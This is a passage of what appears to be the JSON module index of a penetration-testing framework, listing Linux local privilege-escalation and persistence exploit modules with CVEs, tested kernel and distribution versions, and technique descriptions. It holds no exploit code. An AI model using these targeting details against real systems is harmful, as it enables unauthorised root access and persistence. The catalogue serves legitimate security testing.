"URL-https://usn.ubuntu.com/2965-1/",
"URL-https://launchpad.net/bugs/1578705",
"URL-http://changelogs.ubuntu.com/changelogs/pool/main/l/linux/linux_4.4.0-22.39/changelog",
"URL-https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4557.html",
"URL-https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-12-15 05:39:50 +0000",
"path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"double-fdput",
"doubleput.c"
]
}
},
"exploit_linux/local/bpf_sign_extension_priv_esc": {
"name": "Linux BPF Sign Extension Local Privilege Escalation",
"full_name": "exploit/linux/local/bpf_sign_extension_priv_esc",
"rank": 500,
"disclosure_date": "2017-11-12",
"type": "exploit",
"author": [
"Jann Horn",
"bleidl",
"vnik",
"rlarabee",
"h00die",
"bcoles <bcoles@gmail.com>"
],
"description": "Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)\n which contains a vulnerability where it may improperly perform sign\n extension. This can be utilized to escalate privileges.\n\n The target system must be compiled with BPF support and must not have\n kernel.unprivileged_bpf_disabled set to 1.\n\n This module has been tested successfully on:\n\n Debian 9.0 kernel 4.9.0-3-amd64;\n Deepin 15.5 kernel 4.9.0-deepin13-amd64;\n ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\n Fedora 25 kernel 4.8.6-300.fc25.x86_64;\n Fedora 26 kernel 4.11.8-300.fc26.x86_64;\n Fedora 27 kernel 4.13.9-300.fc27.x86_64;\n Gentoo 2.2 kernel 4.5.2-aufs-r;\n Linux Mint 17.3 kernel 4.4.0-89-generic;\n Linux Mint 18.0 kernel 4.8.0-58-generic;\n Linux Mint 18.3 kernel 4.13.0-16-generic;\n Mageia 6 kernel 4.9.35-desktop-1.mga6;\n Manjero 16.10 kernel 4.4.28-2-MANJARO;\n Solus 3 kernel 4.12.7-11.current;\n Ubuntu 14.04.1 kernel 4.4.0-89-generic;\n Ubuntu 16.04.2 kernel 4.8.0-45-generic;\n Ubuntu 16.04.3 kernel 4.10.0-28-generic;\n Ubuntu 17.04 kernel 4.10.0-19-generic;\n ZorinOS 12.1 kernel 4.8.0-39-generic.",
"references": [
"BID-102288",
"CVE-2017-16995",
"EDB-44298",
"EDB-45010",
"URL-https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c",
"URL-https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c",
"URL-https://cyseclabs.com/exploits/upstream44.c",
"URL-https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor",
"URL-https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html",
"URL-https://www.debian.org/security/2017/dsa-4073",
"URL-https://usn.ubuntu.com/3523-2/",
"URL-https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1454",
"URL-http://openwall.com/lists/oss-security/2017/12/21/2",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_sign_extension_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"get-rekt-linux-hardened.c",
"upstream44.c"
]
}
},
"exploit_linux/local/cron_persistence": {
"name": "Cron Persistence",
"full_name": "exploit/linux/local/cron_persistence",
"rank": 600,
"disclosure_date": "1979-07-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will create a cron or crontab entry to execute a payload.\n The module includes the ability to automatically clean up those entries to prevent multiple executions.\n syslog will get a copy of the cron entry.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cron",
"User Crontab",
"System Crontab"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/cron_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/cron_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/desktop_privilege_escalation": {
"name": "Desktop Linux Password Stealer and Privilege Escalation",
"full_name": "exploit/linux/local/desktop_privilege_escalation",
"rank": 600,
"disclosure_date": "2014-08-07",
"type": "exploit",
"author": [
"Jakob Lell"
],
"description": "This module steals the user password of an administrative user on a desktop Linux system\n when it is entered for unlocking the screen or for doing administrative actions using\n PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.\n It exploits the design weakness that there is no trusted channel for transferring the\n password from the keyboard to the actual password verification against the shadow file\n (which is running as root since /etc/shadow is only readable to the root user). Both\n screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under\n the current user account to query for the password and then pass it to a setuid-root binary\n to do the password verification. Therefore, it is possible to inject a password stealer\n after compromising the user account. Since sudo requires only the user password (and not\n the root password of the system), stealing the user password of an administrative user\n directly allows escalating to root privileges. Please note, you have to start a handler\n as a background job before running this exploit since the exploit will only create a shell\n when the user actually enters the password (which may be hours after launching the exploit).\n Using exploit/multi/handler with the option ExitOnSession set to false should do the job.",
"references": [
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/desktop_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/desktop_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/docker_daemon_privilege_escalation": {
"name": "Docker Daemon Privilege Escalation",
"full_name": "exploit/linux/local/docker_daemon_privilege_escalation",
"rank": 600,
"disclosure_date": "2016-06-28",
"type": "exploit",
"author": [
"forzoni"
],
"description": "This module obtains root privileges from any host account with access to the\n Docker daemon. Usually this includes accounts in the `docker` group.",
"references": [
],
"platform": "Linux",
"arch": "x86, x64, armle, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-11 22:46:58 +0000",
"path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/docker_daemon_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
"name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
"full_name": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
"rank": 600,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"Tavis Ormandy",
"zx2c4",
"Marco Ivaldi",
"Todor Donev",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not\n properly restrict use of the LD_AUDIT environment variable when loading\n setuid executables. This allows loading arbitrary shared objects from\n the trusted library search path with the privileges of the suid user.\n\n This module uses LD_AUDIT to load the libpcprofile.so shared object,\n distributed with some versions of glibc, and leverages arbitrary file\n creation functionality in the library constructor to write a root-owned\n world-writable file to a system trusted search path (usually /lib).\n The file is then overwritten with a shared object then loaded with\n LD_AUDIT resulting in arbitrary code execution.\n\n This module has been tested successfully on glibc version 2.11.1 on\n Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.\n\n RHEL 5 is reportedly affected, but untested. Some glibc distributions\n do not contain the libpcprofile.so library required for successful\n exploitation.",
"references": [
"CVE-2010-3847",
"CVE-2010-3856",
"BID-44154",
"BID-44347",
"EDB-15274",
"EDB-15304",
"EDB-18105",
"URL-https://seclists.org/fulldisclosure/2010/Oct/257",
"URL-https://seclists.org/fulldisclosure/2010/Oct/344",
"URL-https://www.ubuntu.com/usn/usn-1009-1",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3847",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3856",
"URL-https://access.redhat.com/security/cve/CVE-2010-3847",
"URL-https://access.redhat.com/security/cve/CVE-2010-3856"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux x86",
"Linux x64"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_ld_audit_dso_load_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_origin_expansion_priv_esc": {
"name": "glibc '$ORIGIN' Expansion Privilege Escalation",
"full_name": "exploit/linux/local/glibc_origin_expansion_priv_esc",
"rank": 600,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not\n properly restrict use of the `LD_AUDIT` environment variable when loading\n setuid executables which allows control over the `$ORIGIN` library search\n path resulting in execution of arbitrary shared objects.\n\n This module opens a file descriptor to the specified suid executable via\n a hard link, then replaces the hard link with a shared object before\n instructing the linker to execute the file descriptor, resulting in\n arbitrary code execution.\n\n The specified setuid binary must be readable and located on the same\n file system partition as the specified writable directory.\n\n This module has been tested successfully on:\n\n glibc 2.5 on CentOS 5.4 (x86_64);\n glibc 2.5 on CentOS 5.5 (x86_64);\n glibc 2.12 on Fedora 13 (i386); and\n glibc 2.5-49 on RHEL 5.5 (x86_64).\n\n Some versions of `ld.so`, such as the version shipped with Ubuntu 14,\n hit a failed assertion in `dl_open_worker` causing exploitation to fail.",
"references": [
"CVE-2010-3847",
"BID-44154",
"EDB-15274",
"URL-https://seclists.org/fulldisclosure/2010/Oct/257",
"URL-https://www.ubuntu.com/usn/usn-1009-1",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3847",
"URL-https://access.redhat.com/security/cve/CVE-2010-3847"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux x86",
"Linux x64"
],
"mod_time": "2019-04-18 15:35:37 +0000",
"path": "/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_origin_expansion_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_realpath_priv_esc": {
"name": "glibc 'realpath()' Privilege Escalation",
"full_name": "exploit/linux/local/glibc_realpath_priv_esc",
"rank": 300,
"disclosure_date": "2018-01-16",
"type": "exploit",
"author": [
"halfdog",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in GNU C Library (glibc) version 2.26 and prior.\n\n This module uses halfdog's RationalLove exploit to exploit a buffer\n underflow in glibc realpath() and create a SUID root shell. The exploit\n has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.\n\n The target system must have unprivileged user namespaces enabled.\n\n This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)\n with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc\n version 2.24-11+deb9u1.",
"references": [
"BID-102525",
"CVE-2018-1000001",
"EDB-43775",
"URL-https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/",
"URL-http://www.openwall.com/lists/oss-security/2018/01/11/5",
"URL-https://securitytracker.com/id/1040162",
"URL-https://sourceware.org/bugzilla/show_bug.cgi?id=22679",
"URL-https://usn.ubuntu.com/3534-1/",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1533836"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_realpath_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"RationalLove.c"
]
}
},
"exploit_linux/local/hp_smhstart": {
"name": "HP System Management Homepage Local Privilege Escalation",
"full_name": "exploit/linux/local/hp_smhstart",
"rank": 300,
"disclosure_date": "2013-03-30",
"type": "exploit",
"author": [
"agix"
],
"description": "Versions of HP System Management Homepage <= 7.1.2 include a setuid root\n smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR\n env variable.",
"references": [
"OSVDB-91990"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP System Management Homepage 7.1.1",
"HP System Management Homepage 7.1.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/hp_smhstart.rb",
"is_install_path": true,
"ref_name": "linux/local/hp_smhstart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/juju_run_agent_priv_esc": {
"name": "Juju-run Agent Privilege Escalation",
"full_name": "exploit/linux/local/juju_run_agent_priv_esc",
"rank": 600,
"disclosure_date": "2017-04-13",
"type": "exploit",
"author": [
"Ryan Beisner",
"David Ames ( <David Ames (@thedac)>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Juju agent systems\n running the juju-run agent utility.\n\n Juju agent systems running agent tools prior to version 1.25.12,\n 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket\n to manage software (\"units\") without setting appropriate permissions,\n allowing unprivileged local users to execute arbitrary commands as root.\n\n This module has been tested successfully with Juju agent tools versions\n 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju\n 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.",
"references": [
"CVE-2017-9232",
"BID-98737",
"URL-https://bugs.launchpad.net/juju/+bug/1682411"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/juju_run_agent_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/juju_run_agent_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/kloxo_lxsuexec": {
"name": "Kloxo Local Privilege Escalation",
"full_name": "exploit/linux/local/kloxo_lxsuexec",
"rank": 600,
"disclosure_date": "2012-09-18",
"type": "exploit",
"author": [
"HTP",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as\n lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,\n Apache by default on CentOS 5.8, the operating system supported by Kloxo.\n This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.",
"references": [
"EDB-25406",
"OSVDB-93287",
"URL-http://roothackers.net/showthread.php?tid=92"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Kloxo 6.1.12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/kloxo_lxsuexec.rb",
"is_install_path": true,
"ref_name": "linux/local/kloxo_lxsuexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/lastore_daemon_dbus_priv_esc": {
"name": "lastore-daemon D-Bus Privilege Escalation",
"full_name": "exploit/linux/local/lastore_daemon_dbus_priv_esc",
"rank": 600,
"disclosure_date": "2016-02-02",
"type": "exploit",
"author": [
"King's Way",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon versions\n 0.9.53-1 on Deepin Linux 15.5 (x64); and\n 0.9.66-1 on Deepin Linux 15.7 (x64).",
"references": [
"EDB-39433",
"URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/libuser_roothelper_priv_esc": {
"name": "Libuser roothelper Privilege Escalation",
"full_name": "exploit/linux/local/libuser_roothelper_priv_esc",
"rank": 500,
"disclosure_date": "2015-07-24",
"type": "exploit",
"author": [
"Qualys",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Red Hat based Linux\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\n injection vulnerability in libuser and userhelper versions prior to\n 0.56.13-8 and version 0.60 before 0.60-7.\n\n This module makes use of the roothelper.c exploit from Qualys to\n insert a new user with UID=0 in /etc/passwd.\n\n Note, the password for the current user is required by userhelper.\n\n Note, on some systems, such as Fedora 11, the user entry for the\n current user in /etc/passwd will become corrupted and exploitation\n will fail.\n\n This module has been tested successfully on libuser packaged versions\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\n 0.56.16-1.fc13 on Fedora 13 (i686);\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\n\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\n is missing various functions required by roothelper.c.",
"references": [
"EDB-37706",
"CVE-2015-3245",
"CVE-2015-3246",
"BID-76021",
"BID-76022",
"URL-https://seclists.org/oss-sec/2015/q3/185",
"URL-https://access.redhat.com/articles/1537873"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/libuser_roothelper_priv_esc",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"roothelper.c"
]
}
},
"exploit_linux/local/nested_namespace_idmap_limit_priv_esc": {
"name": "Linux Nested User Namespace idmap Limit Local Privilege Escalation",
"full_name": "exploit/linux/local/nested_namespace_idmap_limit_priv_esc",
"rank": 500,
"disclosure_date": "2018-11-15",
"type": "exploit",
"author": [
"Jann Horn",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,\n and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user\n namespaces and kernel uid/gid mappings allow elevation to root\n (CVE-2018-18955).\n\n The target system must have unprivileged user namespaces enabled and\n the newuidmap and newgidmap helpers installed (from uidmap package).\n\n This module has been tested successfully on:\n\n Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64;\n Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64);\n Linux Mint 19 kernel 4.15.0-20-generic (x86_64);\n Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).",
"references": [
"BID-105941",
"CVE-2018-18955",
"EDB-45886",
"PACKETSTORM-150381",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1712",
"URL-https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955",
"URL-https://lwn.net/Articles/532593/",
"URL-https://bugs.launchpad.net/bugs/1801924",
"URL-https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955",
"URL-https://security-tracker.debian.org/tracker/CVE-2018-18955",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd",
"URL-https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19",
"URL-https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"subuid_shell.c"
]
}
},
"exploit_linux/local/netfilter_priv_esc_ipv4": {
"name": "Linux Kernel 4.6.3 Netfilter Privilege Escalation",
"full_name": "exploit/linux/local/netfilter_priv_esc_ipv4",
"rank": 400,
"disclosure_date": "2016-06-03",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"vnik"
],
"description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\n 4.4.0-21-generic.\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n We write the ascii files and compile on target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)",
"references": [
"EDB-40049",
"CVE-2016-4997",
"URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ubuntu"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
"is_install_path": true,
"ref_name": "linux/local/netfilter_priv_esc_ipv4",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/network_manager_vpnc_username_priv_esc": {
"name": "Network Manager VPNC Username Privilege Escalation",
"full_name": "exploit/linux/local/network_manager_vpnc_username_priv_esc",
"rank": 600,
"disclosure_date": "2018-07-26",
"type": "exploit",
"author": [
"Denis Andzakovic",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an injection vulnerability in the Network Manager\n VPNC plugin to gain root privileges.\n\n This module uses a new line injection vulnerability in the configured\n username for a VPN network connection to inject a `Password helper`\n configuration directive into the connection configuration.\n\n The specified helper is executed by Network Manager as root when the\n connection is started.\n\n Network Manager VPNC versions prior to 1.2.6 are vulnerable.\n\n This module has been tested successfully with VPNC versions:\n 1.2.4-4 on Debian 9.0.0 (x64); and\n 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).",
"references": [
"CVE-2018-10900",
"URL-https://seclists.org/oss-sec/2018/q3/51",
"URL-https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc",
"URL-https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4",
"URL-https://security-tracker.debian.org/tracker/CVE-2018-10900",
"URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html",
"URL-https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1",
"URL-https://www.debian.org/security/2018/dsa-4253",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1605919",
"URL-https://bugzilla.novell.com/show_bug.cgi?id=1101147"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ntfs3g_priv_esc": {
"name": "Debian/Ubuntu ntfs-3g Local Privilege Escalation",
"full_name": "exploit/linux/local/ntfs3g_priv_esc",
"rank": 400,
"disclosure_date": "2017-01-05",
"type": "exploit",
"author": [
"jannh <jannh@google.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe.\n This can be abused to load a kernel module and execute a binary payload as the root user.",
"references": [
"CVE-2017-0358",
"EDB-41356",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1072"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:39:07 +0000",
"path": "/modules/exploits/linux/local/ntfs3g_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ntfs3g_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/overlayfs_priv_esc": {
"name": "Overlayfs Privilege Escalation",
"full_name": "exploit/linux/local/overlayfs_priv_esc",
"rank": 400,
"disclosure_date": "2015-06-16",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"rebel"
],
"description": "This module attempts to exploit two different CVEs related to overlayfs.\n CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55\n 3.16.0-25 (14.10 default) < 3.16.0-41\n 3.19.0-18 (15.04 default) < 3.19.0-21\n CVE-2015-8660:\n Ubuntu:\n 3.19.0-18 < 3.19.0-43\n 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)\n Fedora:\n < 4.2.8 (vulnerable, un-tested)\n Red Hat:\n < 3.10.0-327 (rhel 6, vulnerable, un-tested)",
"references": [
"EDB-39166",
"EDB-37292",
"CVE-2015-1328",
"CVE-2015-8660"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CVE-2015-1328",
"CVE-2015-8660"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/overlayfs_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/overlayfs_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/pkexec": {
"name": "Linux PolicyKit Race Condition Privilege Escalation",
"full_name": "exploit/linux/local/pkexec",
"rank": 500,
"disclosure_date": "2011-04-01",
"type": "exploit",
"author": [
"xi4oyu",
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "A race condition flaw was found in the PolicyKit pkexec utility and polkitd\n daemon. A local user could use this flaw to appear as a privileged user to\n pkexec, allowing them to execute arbitrary commands as root by running\n those commands with pkexec.\n\n Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu\n libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1\n (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)",
"references": [
"CVE-2011-1485",
"EDB-17942",
"OSVDB-72261"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/pkexec.rb",
"is_install_path": true,
"ref_name": "linux/local/pkexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/rc_local_persistence": {
"name": "rc.local Persistence",
"full_name": "exploit/linux/local/rc_local_persistence",
"rank": 600,
"disclosure_date": "1980-10-01",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will edit /etc/rc.local in order to persist a payload.\n The payload will be executed on the next reboot.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/linux/local/rc_local_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/rc_local_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/rds_priv_esc": {
"name": "Reliable Datagram Sockets (RDS) Privilege Escalation",
